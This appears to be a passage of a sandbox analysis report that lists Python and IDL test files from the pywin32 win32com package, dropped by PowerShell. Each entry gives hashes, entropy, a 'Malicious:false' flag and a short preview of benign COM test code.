                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2275
                                                                                                                                                                                                  Entropy (8bit):4.53047818878344
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Om2KPnvJMkMr/QIA9e8Dt7PKkvVgw/iAII7qgqNMCu:OmX/vKkMrY79lDJnyw/i+qMX
                                                                                                                                                                                                  MD5:6DA80F9CEEDCD38A4E231BE269AAA38A
                                                                                                                                                                                                  SHA1:04CAFA660A9F339D87BA1EA0F0692296CCA8D4EE
                                                                                                                                                                                                  SHA-256:7B699EDF96060CBAB41AF35C0C0F9459E40F65DF75D07767A585E06A68E736B4
                                                                                                                                                                                                  SHA-512:6C0E1AAB36C177B0FF07D98E9992A6EC61354A5FA9F406D461205A9BA3C0EF59C11FC17992994A9274CAB3120EB4926391A814F0C5C16DEA8BDC9DE97DA406A9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# import dao3032.# No longer imported here - callers responsibility to load.#.import win32com.client...def DumpDB(db, bDeep=1):. # MUST be a DB object.. DumpTables(db, bDeep). DumpRelations(db, bDeep). DumpAllContainers(db, bDeep)...def DumpTables(db, bDeep=1):. for tab in db.TableDefs:. tab = db.TableDefs(tab.Name) # Redundant lookup for testing purposes.. print(. "Table %s - Fields: %d, Attributes:%d". % (tab.Name, len(tab.Fields), tab.Attributes). ). if bDeep:. DumpFields(tab.Fields)...def DumpFields(fields):. for field in fields:. print(. " %s, size=%d, reqd=%d, type=%d, defVal=%s". % (. field.Name,. field.Size,. field.Required,. field.Type,. str(field.DefaultValue),. ). )...def DumpRelations(db, bDeep=1):. for relation in db.Relations:. print(. "Relation %s - %

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\errorSemantics.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9004
                                                                                                                                                                                                  Entropy (8bit):4.38218286632829
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lOAcuYO8AjeLHVhLXlODUBSpmNumyqZFuxkNum/qSux5fkC7Q/NpLh5BlWK:Kuwhjw7QiAvGVoh5BlWK
                                                                                                                                                                                                  MD5:8F2899C1FEF4011198D8D735F04CAEEE
                                                                                                                                                                                                  SHA1:283AB4E3ACCA9A7D676A1482C2465B65D4A778DB
                                                                                                                                                                                                  SHA-256:02EDE4F09A9D11E8B19A924A885AEC2309F9FE0C7C43C487EFB178B32EAC1DB6
                                                                                                                                                                                                  SHA-512:61990392B37A133E8ACF88A68288CE4D66A9CB620C0289E91A1F62C3DF5AA7767E5B83076F85E3546AEC5586B719CD2CCFA92E2AB1A6F811A2B80E9727682AA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# errorSemantics.py..# Test the Python error handling semantics. Specifically:.#.# * When a Python COM object is called via IDispatch, the nominated.# scode is placed in the exception tuple, and the HRESULT is.# DISP_E_EXCEPTION.# * When the same interface is called via IWhatever, the.# nominated scode is returned directly (with the scode also.# reflected in the exception tuple).# * In all cases, the description etc end up in the exception tuple.# * "Normal" Python exceptions resolve to an E_FAIL "internal error"..import pythoncom.import winerror.from win32com.client import Dispatch.from win32com.server.exception import COMException.from win32com.server.util import wrap.from win32com.test.util import CaptureWriter...class error(Exception):. def __init__(self, msg, com_exception=None):. Exception.__init__(self, msg, str(com_exception))...# Our COM server..class TestServer:. _public_methods_ = ["Clone", "Commit", "LockRegion", "Read"]. _com_interfaces_ = [python

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\pippo.idl

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Java source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1852
                                                                                                                                                                                                  Entropy (8bit):5.4123717871378565
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:QXxmFu3M4pcjG2hbieT2XWh1bipqM6FNtsg6EqVpawtNLZUqsA:smFuf19WhcYtsoqVkmNj
                                                                                                                                                                                                  MD5:B5C7D77C0E0A157B3BB3E60C12720929
                                                                                                                                                                                                  SHA1:1C17D53A336572849F7F39068C377B20D29C122A
                                                                                                                                                                                                  SHA-256:20A7F279413384171B16C2DD282D1F37B07529FF18DB21707B7D0EEA6E6788D5
                                                                                                                                                                                                  SHA-512:A38B2C7A544404A06FED7A360F58CEC884B1929DD2B789C465C6ED01707A46D36B64E7E0EF1C0FC9FB4133357F17DF6F7C1BEBC7E42DE5AA6409DC394738375A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:// TestServer.idl : IDL source for TestServer.dll.//..// This file will be processed by the MIDL tool to.// produce the type library (TestServer.tlb) and marshalling code...import "oaidl.idl";.import "ocidl.idl";..[...object,...uuid(50086EE8-F535-464B-806E-365ADBB727CF),...dual,...helpstring("ITestServerApp Interface"),...pointer_default(unique)..]..interface ITestServerApp : IDispatch..{...[id(1), helpstring("method Test1")] HRESULT Test1([out, retval] ITestServerApp **pVal);...[id(2), helpstring("method Test2")] HRESULT Test2([out, retval] VARIANT *pVar);...[propget, id(3), helpstring("property MyProp1")] HRESULT MyProp1([out, retval] long *pVal);..};..[...object,...uuid(618DB2A3-D5BD-4850-B66A-828727EB37E5),...dual,...helpstring("IPippo Interface"),...pointer_default(unique)..]..interface IPippo : IDispatch..{.....[id(1), helpstring("method Method1")] HRESULT Method1([out, retval] IPippo **val);...[propget, id(2), helpstring("property MyProp1")] HRESULT MyProp1([out, retval] long *p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\pippo_server.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2668
                                                                                                                                                                                                  Entropy (8bit):4.845449802014032
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:kGQgRgHtSdUZyT2KYeSZeiHqjaF+x7JH2hLxxbzXLEQjx7wig7RClxw0DGBDIUvt:SOgHUCUTt6Z/qRx7JObzXoQjxs/7RMRE
                                                                                                                                                                                                  MD5:31E596A4A116C132B9059E660328B010
                                                                                                                                                                                                  SHA1:B813D06DD26C3B4DA10F6697A17D4946AED62868
                                                                                                                                                                                                  SHA-256:0428F943D77AB53D3C4FB1B40CCE705B9CAE09AB5516D17D3BC0F83001FAF5A1
                                                                                                                                                                                                  SHA-512:0913AEE8ED8A9BD5A8ACD5BE4D1AB6EE80C51562C35B4D5481282AE91D484767D602963F75BA5D2F2C683144C878AB88D27599B427E0B7227D241599A1F64009
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A little test server, complete with typelib, we can use for testing..# Originally submitted with bug:.# [ 753154 ] memory leak wrapping object having _typelib_guid_ attribute.# but modified by mhammond for use as part of the test suite..import os.import sys..import pythoncom.import win32com.import winerror.from win32com.server.util import wrap...class CPippo:. #. # COM declarations. #. _reg_clsid_ = "{1F0F75D6-BD63-41B9-9F88-2D9D2E1AA5C3}". _reg_desc_ = "Pippo Python test object". _reg_progid_ = "Python.Test.Pippo". # _reg_clsctx_ = pythoncom.CLSCTX_LOCAL_SERVER. ###. ### Link to typelib. _typelib_guid_ = "{7783054E-9A20-4584-8C62-6ED2A08F6AC6}". _typelib_version_ = 1, 0. _com_interfaces_ = ["IPippo"].. def __init__(self):. self.MyProp1 = 10.. def Method1(self):. return wrap(CPippo()).. def Method2(self, in1, inout1):. return in1, inout1 * 2.. def Method3(self, in1):. # in1 will be a tuple, not a list..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\policySemantics.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3162
                                                                                                                                                                                                  Entropy (8bit):4.799405335387886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qHKBl1In7GNgJqshzp4RkNFVDY2kXku1yJ6tKf7Ivo7Mq:yaNgJqshNNnky4tm37Mq
                                                                                                                                                                                                  MD5:0EAE751168AFC8B1EAC7CD2BC2491E66
                                                                                                                                                                                                  SHA1:B57A463F531E46F9F1E1449D2B78CF36D4D7AC32
                                                                                                                                                                                                  SHA-256:42748BD390A7C58280E7ECFF5F8EDC1FFD731885B7A5BD20CD835E42326CC20C
                                                                                                                                                                                                  SHA-512:C973B03123F8B62F7AB4561E164EAC9C5ED195AF01440FA65A5513B821E0D276C752984A515BEB0625975EEC3F87F3A32C53F026D58E81D882B36008C5F1C0A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.client.import win32com.server.util.import win32com.test.util.import winerror...class Error(Exception):. pass...# An object representing a list of numbers.class PythonSemanticClass:. _public_methods_ = ["In"] # DISPIDs are allocated.. _dispid_to_func_ = {10: "Add", 11: "Remove"} # DISPIDs specified by the object... def __init__(self):. self.list = [].. def _NewEnum(self):. return win32com.server.util.NewEnum(self.list).. def _value_(self):. # should return an array.. return self.list.. def _Evaluate(self):. # return the sum. return sum(self.list).. def In(self, value):. return value in self.list.. def Add(self, value):. self.list.append(value).. def Remove(self, value):. self.list.remove(value)...def DispExTest(ob):. if not __debug__:. print("WARNING: Tests dressed up as assertions are being skipped!"). assert ob.GetDispID("Add", 0

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testADOEvents.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2788
                                                                                                                                                                                                  Entropy (8bit):4.505156868473806
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:KDeDWnty1wVrWA6e8AV0YmHBYyjdTbGlFDFC2Vnxc/aHSm3:KDeeAmWAhVxOyqdPqVFZxYMB3
                                                                                                                                                                                                  MD5:D170E9179ED45F2FFB7C6F560FE07974
                                                                                                                                                                                                  SHA1:420A06DDC0F8FCCB9247D3925D289B6A2B10D6A4
                                                                                                                                                                                                  SHA-256:41D36D127B053B0B77CD7B282275D52B892989C40452358471FA43729923432A
                                                                                                                                                                                                  SHA-512:31D63C719A5E1085533A5D3D4D77FB1F133EE9A9FC502E3744786520C38AA55F99EFD670E77CDAFCB41785E164A3AF805788BB1660FE079065268A4D264D38E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import time..import pythoncom.from win32com.client import Dispatch, DispatchWithEvents, constants..finished = 0 # Flag for the wait loop from (3) to test...class ADOEvents: # event handler class. def OnWillConnect(self, str, user, pw, opt, sts, cn):. # Must have this event, as if it is not handled, ADO assumes the. # operation is cancelled, and raises an error (Operation cancelled. # by the user). pass.. def OnConnectComplete(self, error, status, connection):. # Assume no errors, until we have the basic stuff. # working. Now, "connection" should be an open. # connection to my data source. # Do the "something" from (2). For now, just. # print the connection data source. print("connection is", connection). print("Connected to", connection.Properties("Data Source")). # OK, our work is done. Let the main loop know. global finished. finished = 1.. def OnCommitTransComplete(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testAXScript.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1334
                                                                                                                                                                                                  Entropy (8bit):4.768567300771705
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:BxgWbb79C7MZ83h8XlyPXEQIh6q7M+J8dHx+qfcj2IK7M+J88YOsdRf2/pLMb:BxgMhiMDlEEQZqMX+QcgMEadi4
                                                                                                                                                                                                  MD5:0EA7B173234195812C288240590CB6C6
                                                                                                                                                                                                  SHA1:835328B2831B2F8DAE57EF7F2074D2599895590E
                                                                                                                                                                                                  SHA-256:27DAAD392421D9D968F73448E585EC9010C8A4C6F119AB0079D8015899D5838E
                                                                                                                                                                                                  SHA-512:4D4F237E9E632540A7591F5C50F4449199ABF0F0411B1A4E67815099DA69395719D705D5E5976E9EE0C73D3541984376F8764D18371A5D1E24ED3AFCB408104C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test AXScripting the best we can in an automated fashion....import os.import sys..import win32api.import win32com.axscript.import win32com.axscript.client.import win32com.test.util..verbose = "-v" in sys.argv...class AXScript(win32com.test.util.TestCase):. def setUp(self):. file = win32api.GetFullPathName(. os.path.join(win32com.axscript.client.__path__[0], "pyscript.py"). ). from win32com.test.util import RegisterPythonServer.. self.verbose = verbose. RegisterPythonServer(file, "python", verbose=self.verbose).. def testHost(self):. file = win32api.GetFullPathName(. os.path.join(win32com.axscript.__path__[0], "test\\testHost.py"). ). cmd = '%s "%s"' % (win32api.GetModuleFileName(0), file). if verbose:. print("Testing Python Scripting host"). win32com.test.util.ExecuteShellCommand(cmd, self).. def testCScript(self):. file = win32api.GetFullPathName(. os.pat

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testAccess.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5780
                                                                                                                                                                                                  Entropy (8bit):4.725019650399569
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Wktg4A4KElc/6vGc8XBfe0zXYFRmqdZ9E/1RL9//VrxSAth5L0PWWX6w0kqtioVg:jv06vG7XBfXXwRmq/u/1Jx/VrxSAth5Q
                                                                                                                                                                                                  MD5:061C7D4B0F39A434B949194498C2B08F
                                                                                                                                                                                                  SHA1:C9394BD4640559CEF1B236F076FDA4F276AE21CA
                                                                                                                                                                                                  SHA-256:101DBE1A4A0FC8C78284602097D2F7DB34345C18B9C9E416A7709BB54E844515
                                                                                                                                                                                                  SHA-512:A45A9E9CEBC051B6635F75832CCC09DB5F6F7BD81EAEB6026BF9DCA39C78F64B32110AB4A7B590DB201F2940355528A3B0656159BCF1435398D72006A108E9D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This assumes that you have MSAccess and DAO installed..# You need to run makepy.py over "msaccess.tlb" and.# "dao3032.dll", and ensure the generated files are on the.# path...# You can run this with no args, and a test database will be generated..# You can optionally pass a dbname on the command line, in which case it will be dumped...import os.import sys..import pythoncom.import win32api.from win32com.client import Dispatch, constants, gencache...def CreateTestAccessDatabase(dbname=None):. # Creates a test access database - returns the filename.. if dbname is None:. dbname = os.path.join(win32api.GetTempPath(), "COMTestSuiteTempDatabase.mdb").. access = Dispatch("Access.Application"). dbEngine = access.DBEngine. workspace = dbEngine.Workspaces(0).. try:. os.unlink(dbname). except os.error:. print(. "WARNING - Unable to delete old test database - expect a COM exception RSN!". ).. newdb = workspace.CreateDatabase(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testArrays.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2061
                                                                                                                                                                                                  Entropy (8bit):4.550510002812803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:VcGwh5Af74nk7flVn5woodznnTJR39tRnM8Wvt1ubghpz5GNaZW6:VcJBnkzz5rohnTzDRM88/5xl
                                                                                                                                                                                                  MD5:9911ADB1E23A413CCB564455420234EC
                                                                                                                                                                                                  SHA1:EF1E01991BFD2200D00F79363DC860510E2AF09A
                                                                                                                                                                                                  SHA-256:15C1BD5A8DB3B27EC9342AD24EEED80E4DB9469D43CD055810EFD5BF6CBE6AE9
                                                                                                                                                                                                  SHA-512:E49C4D853F16A13F6B90B6878DDB9C554494EAF389A40C12E2148D898B01ACC749BD1EE471965DC8E69B2E24F2598660B1804B7F9B18CE3250739F0CA957D2E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Originally contributed by Stefan Schukat as part of this arbitrary-sized.# arrays patch...from win32com.client import gencache.from win32com.test import util..ZeroD = 0.OneDEmpty = [].OneD = [1, 2, 3].TwoD = [[1, 2, 3], [1, 2, 3], [1, 2, 3]]..TwoD1 = [[[1, 2, 3, 5], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3], [1, 2, 3]]]..OneD1 = [[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3]]]..OneD2 = [. [1, 2, 3],. [1, 2, 3, 4, 5],. [[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]],.]...ThreeD = [[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [[1, 2, 3], [1, 2, 3], [1, 2, 3]]]..FourD = [. [. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. ],. [. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. [[1, 2, 3], [1, 2, 3], [1, 2, 3]],. ],.]..LargeD = [. [[list(range(10))] * 10],.] * 512...def _normalize_array(a):. if type(a) != type(()):. return

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testClipboard.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5802
                                                                                                                                                                                                  Entropy (8bit):4.851907074785958
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:d3G3yJRy++YTpkUkppL9rpI9rpsKwpWpbKYctEolEpBLdHDz:pHLvqh9G9O+KY5R5Dz
                                                                                                                                                                                                  MD5:40FA1C5FE65D9B6B85989F3386EE6C1A
                                                                                                                                                                                                  SHA1:164C2B350723BEFBCF30C8E4FF1F24F775EEF9DF
                                                                                                                                                                                                  SHA-256:19712D0E526A97DB0E993F5B8DC8B56B420461D06AFD68C13E02EEAF39802D8D
                                                                                                                                                                                                  SHA-512:0E01639DAFB636B258EF378D1803950885D7BE4E70CCFEC161B2989847558C79D53319B5AB2669AE02647BE05FFD4E33008511B6F15C8C0CCE3A3F1347E40C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# testClipboard.py.import unittest..import pythoncom.import win32clipboard.import win32con.import winerror.from win32com.server.exception import COMException.from win32com.server.util import NewEnum, wrap..IDataObject_Methods = """GetData GetDataHere QueryGetData. GetCanonicalFormatEtc SetData EnumFormatEtc. DAdvise DUnadvise EnumDAdvise""".split()..# A COM object implementing IDataObject used for basic testing..num_do_objects = 0...def WrapCOMObject(ob, iid=None):. return wrap(ob, iid=iid, useDispatcher=0)...class TestDataObject:. _com_interfaces_ = [pythoncom.IID_IDataObject]. _public_methods_ = IDataObject_Methods.. def __init__(self, bytesval):. global num_do_objects. num_do_objects += 1. self.bytesval = bytesval. self.supported_fe = []. for cf in (win32con.CF_TEXT, win32con.CF_UNICODETEXT):. fe = cf, None, pythoncom.DVASPECT_CONTENT, -1, pythoncom.TYMED_HGLOBAL. sel

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testCollections.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4443
                                                                                                                                                                                                  Entropy (8bit):4.674081014404411
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:P3gyH5QxTexLwTtkxaCUaBJEIiGSi6/JX4l6fMq:/6YBwTt2aCUaBJEIi3Uq
                                                                                                                                                                                                  MD5:E64F560B16F23A6C53CDA967891831FA
                                                                                                                                                                                                  SHA1:08A00EB556B98DB0CA4644CF3C9FF2365171DC1F
                                                                                                                                                                                                  SHA-256:CE5C7E12F648158429A63248B1F7CEF0353DD0DAB3835D11D283CFC682601E4F
                                                                                                                                                                                                  SHA-512:F63C3B65C4DF416A16719875F9D39B04D44AABA9B6AAA500FF47D123BAD70DC6AF21442683425EE6ED862639633DA33DF4CABF3F53152651EA527799340E3072
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# testCollections.py.#.# This code tests both the client and server side of collections.# and enumerators..#.# Also has the side effect of testing some of the PythonCOM error semantics..import sys..import pythoncom.import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.import winerror..L = pywintypes.Unicode..import unittest..error = "collection test error"...def MakeEmptyEnum():. # create the Python enumerator object as a real COM object. o = win32com.server.util.wrap(win32com.server.util.Collection()). return win32com.client.Dispatch(o)...def MakeTestEnum():. # create a sub-collection, just to make sure it works :-). sub = win32com.server.util.wrap(. win32com.server.util.Collection(["Sub1", 2, "Sub3"]). ). # create the Python enumerator object as a real COM object. o = win32com.server.util.wrap(win32com.server.util.Collection([1, "Two", 3, sub])). return win32com.client.Dispatch(o)...def TestEnumAgainst(o, chec

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testConversionErrors.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):796
                                                                                                                                                                                                  Entropy (8bit):4.605369687400832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:LLiXsLrrLyrjYBixmq65rbbjUM/dYUAwIJjPp93plx5kL/pJAgWcxG/2pV7u:aXU6r2ixmt5rbbKwItp93pJC/kabpVS
                                                                                                                                                                                                  MD5:377110CBCCAC1A4BEC1896F9F211BA1F
                                                                                                                                                                                                  SHA1:66D9E60D528F263CDC2ED371B9FAB006FE78315B
                                                                                                                                                                                                  SHA-256:C72E60565E7928ABEBC9E775C96A7665013DD983A70AD5F0DB713ABE94D4216B
                                                                                                                                                                                                  SHA-512:8F1B9304C788D362C65CCB0513478386BA9B5B747F461B1AC9682FCD4299968AD2F6D4A5562A2A48D04896E485A591A41CB6A74F2A88F42AEDCFF2C74C33AE0D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import win32com.client.import win32com.server.util.import win32com.test.util...class Tester:. _public_methods_ = ["TestValue"].. def TestValue(self, v):. pass...def test_ob():. return win32com.client.Dispatch(win32com.server.util.wrap(Tester()))...class TestException(Exception):. pass...# The object we try and pass - pywin32 will call __float__ as a last resort..class BadConversions:. def __float__(self):. raise TestException()...class TestCase(win32com.test.util.TestCase):. def test_float(self):. try:. test_ob().TestValue(BadConversions()). raise Exception("Should not have worked"). except Exception as e:. assert isinstance(e, TestException)...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testDCOM.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1732
                                                                                                                                                                                                  Entropy (8bit):4.841849428968686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:4oDDywkk/NNn/7kU3A/In8elEhClR+1DPrJJ1sm:4oLkeNdjkU3A/In8QEhClRcTrJJ19
                                                                                                                                                                                                  MD5:D36A0521C4E65ACB2209802A99D0D3E9
                                                                                                                                                                                                  SHA1:6CAA0926465B940ECFFB7F381205256A54DAFE74
                                                                                                                                                                                                  SHA-256:FCE630DA607E58C51908FC604E86C99F83DAC990A88FC0F919899450278F845E
                                                                                                                                                                                                  SHA-512:73E9F5294A45EC06D1A0B2E607ECA706E4386DDE91C289F798F7CDF5ED62FD1F618139B09CEBFC21EAC45B1389C3D5570BF3D0563C7DA05D006741CC3FDA19BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# testDCOM.usage = """\.testDCOM.py - Simple DCOM test.Usage: testDCOM.py serverName..Attempts to start the Python.Interpreter object on the named machine,.and checks that the object is indeed running remotely...Requires the named server be configured to run DCOM (using dcomcnfg.exe),.and the Python.Interpreter object installed and registered on that machine...The Python.Interpreter object must be installed on the local machine,.but no special DCOM configuration should be necessary..""".import string.import sys..# NOTE: If you configured the object locally using dcomcnfg, you could.# simple use Dispatch rather than DispatchEx..import pythoncom.import win32api.import win32com.client...def test(serverName):. if string.lower(serverName) == string.lower(win32api.GetComputerName()):. print("You must specify a remote server name, not the local machine!"). return.. # Hack to overcome a DCOM limitation. As the Python.Interpreter object. # is probably installed locally a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testDates.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1834
                                                                                                                                                                                                  Entropy (8bit):4.179560618402457
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:BtkkNyYBAexbbfgaYeRPKg3VqAIVqA5VFAYqA+fS:cb5exnfg6Rf3cpcoPwTq
                                                                                                                                                                                                  MD5:C98D7045D5C7E22E7DDD41FF4DAF859C
                                                                                                                                                                                                  SHA1:F9547616FE1830FE748C7585B2AE3352EEC0B240
                                                                                                                                                                                                  SHA-256:1BB28A2FD0A2B3861CCE11D5F9A45CBFC37BECD2EE9E8BCB05804AC4789383F6
                                                                                                                                                                                                  SHA-512:BF78B445ED548FEB3BAFA50D88328486E27F7B08D53409A7E83E7ACA6DAE07C6FE67DE6FB5C7EAD6DC76F619684F91368906B0360E0AA7CA5F1463016F0E8A5B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest.from datetime import datetime..import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.from win32timezone import TimeZoneInfo...# A COM object so we can pass dates to and from the COM boundary..class Tester:. _public_methods_ = ["TestDate"].. def TestDate(self, d):. assert isinstance(d, datetime). return d...def test_ob():. return win32com.client.Dispatch(win32com.server.util.wrap(Tester()))...class TestCase(win32com.test.util.TestCase):. def check(self, d, expected=None):. if not issubclass(pywintypes.TimeType, datetime):. self.skipTest("this is testing pywintypes and datetime"). got = test_ob().TestDate(d). self.assertEqual(got, expected or d).. def testUTC(self):. self.check(. datetime(. year=2000,. month=12,. day=25,. microsecond=500000,. tzinfo=TimeZoneInfo.utc(),.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testDictionary.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2875
                                                                                                                                                                                                  Entropy (8bit):4.859731215502719
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8AEknoCYxkIhbrGksfwL/EJj6/scGKXlUZNBGE/ekq/RkqA/skzlR3JG2fsfS:bEYYxRbrGksfwL/G6/shoVAvbfsq
                                                                                                                                                                                                  MD5:2CA11548E2B2588FFBC3BC645B821E47
                                                                                                                                                                                                  SHA1:BA14915A82A76428FBA871F6A81BA9E18C83C896
                                                                                                                                                                                                  SHA-256:65BF6775773CFA1CBBC8D872975D44D2E91C4EFA5734BD991478ED67F1AF613B
                                                                                                                                                                                                  SHA-512:826F0A9B1FE496A92C04AC33C6D29C3F1826E5ED03B4F2F886D3FA99A997FF231E2B4F1F9639676A0DE9C267B27C49B3736A1054B2996BE9F03ADC63D49540A3
                                                                                                                                                                                                  Malicious:false
